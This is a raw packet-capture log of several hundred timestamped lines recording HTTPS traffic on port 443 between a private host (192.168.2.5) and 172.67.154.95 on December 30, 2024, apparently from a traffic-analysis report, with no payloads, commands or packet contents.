Dec 30, 2024 19:15:13.012312889 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.012341976 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.012361050 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.012902975 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.012917042 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.012974024 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.012980938 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.013015032 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.020514965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.020535946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.020591974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.020597935 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.020639896 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.021415949 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.021435022 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.021493912 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.021500111 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.021600962 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.038033962 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.038054943 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.038115025 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.038127899 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.038156033 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.038175106 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.038410902 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.038425922 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.038465977 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.038471937 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.038496017 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.038522005 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.066914082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.066941023 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.067019939 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.067039013 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.067075968 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.079374075 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.079394102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.079446077 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.079464912 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.079672098 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.102281094 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.102303028 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.102363110 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.102384090 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.102447033 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.102994919 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.103008986 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.103053093 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.103059053 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.103292942 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.109114885 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.109132051 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.109200001 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.109210968 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.109272957 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.109945059 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.109960079 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.109998941 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.110003948 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.110025883 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.110040903 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.126882076 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.126902103 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.126950979 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.126966953 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.126991034 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.127013922 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.127561092 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.127577066 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.127638102 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.127645016 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.127681971 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.155385971 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.155405998 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.155462980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.155479908 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.155509949 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.167831898 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.167850018 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.167901993 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.167912960 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.167943001 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.190802097 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.190820932 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.190875053 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.190887928 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.191154957 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.191591978 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.191607952 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.191652060 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.191657066 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.191761971 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.197666883 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.197685003 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.197725058 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.197731972 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.197758913 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.197794914 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.198458910 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.198472977 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.198520899 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.198528051 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.198575974 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.215605021 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.215635061 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.215686083 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.215699911 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.215935946 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.216124058 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.216141939 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.216181040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.216187000 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.216212988 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.216228962 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.244044065 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.244059086 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.244117975 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.244127989 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.244163036 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.256571054 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.256591082 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.256625891 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.256632090 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.256669998 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.279583931 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.279612064 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.279694080 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.279715061 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.279761076 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.280226946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.280245066 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.280304909 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.280313015 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.280360937 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.286262989 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.286287069 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.286386967 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.286403894 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.286607027 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.287080050 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.287097931 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.287161112 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.287168026 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.287245989 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.304121971 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.304147005 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.304198027 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.304212093 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.304246902 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.304778099 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.304791927 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.304831982 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.304836035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.304866076 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.332753897 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.332777977 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.332842112 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.332868099 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.332886934 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.332904100 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.345319033 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.345343113 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.345385075 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.345402002 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.345416069 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.345438957 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.368242025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.368268013 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.368313074 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.368328094 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.368347883 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.368359089 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.368894100 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.368910074 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.368947029 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.368952036 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.368992090 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.375094891 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.375113964 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.375164986 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.375175953 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.375201941 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.375214100 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.375616074 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.375631094 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.375674009 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.375680923 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.375770092 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.392765999 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.392786980 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.392832994 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.392847061 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.392868996 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.392887115 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.393471956 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.393487930 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.393522024 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.393527031 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.393556118 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.421226025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.421253920 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.421300888 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.421322107 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.421405077 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.433743000 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.433763027 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.433815956 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.433829069 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.433845997 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.433861971 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.456903934 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.456918955 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.456967115 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.456983089 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.457011938 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.457030058 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.457326889 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.457346916 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.457385063 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.457390070 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.457420111 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.457437038 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.463483095 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.463501930 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.463551998 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.463561058 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.463640928 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.464276075 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.464294910 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.464329004 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.464334011 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.464359045 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.485743999 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.485759974 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.485805035 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.485820055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.485848904 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.485877037 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.486423969 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.486438036 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.486478090 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.486485004 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.486524105 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.517832041 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.517847061 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.517904043 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.517929077 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.517951012 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.517967939 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.522473097 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.522486925 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.522548914 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.522555113 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.522583961 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.522612095 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.545474052 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.545488119 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.545526981 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.545536041 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.545566082 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.545574903 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.546355963 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.546371937 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.546422958 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.546428919 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.546469927 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.552105904 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.552119970 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.552160025 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.552165031 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.552196980 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.552867889 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.552881956 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.552928925 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.552936077 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.552946091 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.552974939 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.574390888 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.574409008 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.574492931 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.574518919 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.574563026 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.575160027 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.575175047 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.575225115 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.575232983 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.575308084 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.606643915 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.606662035 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.606736898 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.606760979 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.606813908 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.610989094 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.611004114 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.611064911 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.611073971 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.611278057 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.634457111 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.634471893 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.634531021 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.634538889 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.634592056 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.635153055 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.635166883 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.635215044 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.635221004 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.635247946 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.635260105 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.643066883 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.643081903 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.643150091 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.643157005 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.643193007 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.643944025 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.643958092 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.644009113 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.644013882 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.644046068 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.644062996 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.663023949 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.663037062 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.663120031 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.663147926 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.663197041 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.663573980 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.663588047 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.663639069 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.663645029 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.663682938 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.695262909 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.695277929 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.695359945 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.695359945 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.695369959 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.695553064 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.699584007 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.699599028 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.699649096 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:13.699656010 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:13.699716091 CET	49709	443	192.168.2.5	172.67.154.95
